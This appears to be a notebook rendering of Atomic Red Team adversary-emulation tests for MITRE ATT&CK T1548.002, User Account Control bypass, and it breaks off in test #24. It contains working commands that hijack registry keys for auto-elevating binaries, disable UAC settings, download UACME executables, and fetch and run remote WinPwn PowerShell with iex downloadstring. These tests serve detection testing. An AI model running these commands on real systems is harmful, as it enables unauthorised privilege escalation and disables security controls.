# T1548.002 - Bypass User Account Control
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)

## Atomic Tests

### Atomic Test #1 - Bypass UAC using Event Viewer (cmd)Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution command prompt should be launched with administrative privileges. 
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f
cmd.exe /c eventvwr.msc
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 1

#### Cleanup: 
```cmd
reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell)PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution command prompt should be launched with administrative privalages
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 2

#### Cleanup: 
```powershell
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Bypass UAC using FodhelperBypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
fodhelper.exe
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 3

#### Cleanup: 
```cmd
reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Bypass UAC using Fodhelper - PowerShellPowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution command prompt will be opened.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 4

#### Cleanup: 
```powershell
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell)PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
Upon execution administrative command prompt should open
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 5

#### Cleanup: 
```powershell
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 5 -Cleanup

### Atomic Test #6 - Bypass UAC by Mocking Trusted DirectoriesCreates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
mkdir "\\?\C:\Windows \System32\"
copy "C:\Windows\System32\cmd.exe" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 6

#### Cleanup: 
```cmd
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Bypass UAC using sdclt DelegateExecuteBypasses User Account Control using a fileless method, registry only.
Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value 'cmd.exe /c notepad.exe'
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
Start-Process -FilePath $env:windir\system32\sdclt.exe
Start-Sleep -s 3
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 7

#### Cleanup: 
```powershell
Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 7 -Cleanup

### Atomic Test #8 - Disable UAC using reg.exeDisable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 8

#### Cleanup: 
```cmd
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Bypass UAC using SilentCleanup taskBypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/

There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).

For example, we can set the windir registry kye to: "cmd /k REM "

And forcefully run SilentCleanup task:

schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\T1548.002\src\T1548.002.bat"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 9

### Atomic Test #10 - UACME Bypass Method 23
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: Leo Davidson derivative

Type:	Dll Hijack

Method: IFileOperation

Target:	\system32\pkgmgr.exe

Component: DismCore.dll

Implementation:	ucmDismMethod

UCM Method:	UacMethodDISM

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\23 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\23 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 10

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 10 -Cleanup

### Atomic Test #11 - UACME Bypass Method 31
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: Enigma0x3

Type:	Shell API

Method: Registry key manipulation

Target:	\system32\sdclt.exe

Component: Attacker defined

Implementation:	ucmSdcltIsolatedCommandMethod

UCM Method:	UacMethodShellSdclt

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\31 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 11 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\31 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 11

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 11 -Cleanup

### Atomic Test #12 - UACME Bypass Method 33
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: winscripting.blog

Type:	Shell API

Method: Registry key manipulation

Target:	\system32\fodhelper.exe

Component:	Attacker defined

Implementation:	ucmShellRegModMethod

UCM Method:	UacMethodMsSettings2

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\33 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 12 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\33 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 12

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 12 -Cleanup

### Atomic Test #13 - UACME Bypass Method 34
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: James Forshaw

Type:	Shell API

Method: Environment variables expansion

Target:	\system32\svchost.exe via \system32\schtasks.exe

Component:	Attacker defined

Implementation:	ucmDiskCleanupEnvironmentVariable

UCM Method:	UacMethodDiskSilentCleanup

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\34 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 13 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\34 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 13

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 13 -Cleanup

### Atomic Test #14 - UACME Bypass Method 39
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: Stefan Kanthak

Type:	Dll Hijack

Method: .NET Code Profiler

Target:	\system32\mmc.exe

Component:	Attacker defined

Implementation:	ucmCorProfilerMethod

UCM Method:	UacMethodCorProfiler

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\39 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 14 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\39 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 14

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 14 -Cleanup

### Atomic Test #15 - UACME Bypass Method 56
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: Hashim Jawad

Type:	Shell API

Method: Registry key manipulation

Target:	\system32\WSReset.exe

Component:	Attacker defined

Implementation:	ucmShellRegModMethod

UCM Method:	UacMethodShellWSReset

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\56 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 15 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\56 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 15

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 15 -Cleanup

### Atomic Test #16 - UACME Bypass Method 59
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: James Forshaw

Type:	AppInfo ALPC

Method: RAiLaunchAdminProcess and DebugObject

Target:	Attacker defined

Component:	Attacker defined

Implementation:	ucmDebugObjectMethod

UCM Method:	UacMethodDebugObject

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\59 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 16 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\59 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 16

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 16 -Cleanup

### Atomic Test #17 - UACME Bypass Method 61
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.

Author: Enigma0x3/bytecode77 derivative by Nassim Asrir

Type:	Shell API

Method: Registry key manipulation

Target:	\system32\slui.exe, \system32\changepk.exe

Component:	Attacker defined

Implementation:	ucmShellRegModMethod

UCM Method:	UacMethodDebugObject

https://github.com/hfiref0x/UACME

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: UACME executable must exist on disk at specified location ("#{uacme_exe}")

##### Check Prereq Commands:
```cmd
$tempPath = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\uacme\61 Akagi64.exe
if (Test-Path "$tempPath") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force

```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 17 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
"PathToAtomicsFolder\..\ExternalPayloads\uacme\61 Akagi64.exe"
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 17

#### Cleanup: 
```cmd
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 17 -Cleanup

### Atomic Test #18 - WinPwn - UAC MagicUAC bypass using Magic technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 18

### Atomic Test #19 - WinPwn - UAC Bypass ccmstp techniqueUAC bypass using ccmstp technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 19

### Atomic Test #20 - WinPwn - UAC Bypass DiskCleanup techniqueUAC bypass using DiskCleanup technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 20

### Atomic Test #21 - WinPwn - UAC Bypass DccwBypassUAC techniqueUAC Bypass DccwBypassUAC technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 21

### Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry keyDisable User Account Conrol (UAC) for admin by setting the registry key 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0.

[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/), 
[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit), 
[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 22

#### Cleanup: 
```powershell
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 22 -Cleanup

### Atomic Test #23 - UAC Bypass with WSReset Registry ModificationThe following UAC bypass is focused on a registry key under "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" that will trigger a command once wsreset.exe runs. 
This bypass is limited to Windows 10 1803/1809 and may not run on Server platforms. The registry mod is where interest will be.
If successful, the command to run will spawn off wsreset.exe. 
[UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/)
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-Item HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Force | Out-Null
New-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name "DelegateExecute" -Value "" -Force | Out-Null
Set-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name "(default)" -Value "C:\Windows\System32\cmd.exe /c start cmd.exe" -Force -ErrorAction SilentlyContinue | Out-Null
$Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 23

#### Cleanup: 
```powershell
Remove-Item HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Recurse -Force
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 23 -Cleanup

### Atomic Test #24 - Disable UAC - Switch to the secure desktop when prompting for elevation via registry keyUser Account Control (UAC) is a security mechanism for limiting the elevation of privileges, including administrative accounts, unless authorized. 
This setting ensures that the elevation prompt is only used in secure desktop mode.
Disable User Account Conrol (UAC) for secure desktop by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop to 0.
**Supported Platforms:** windows
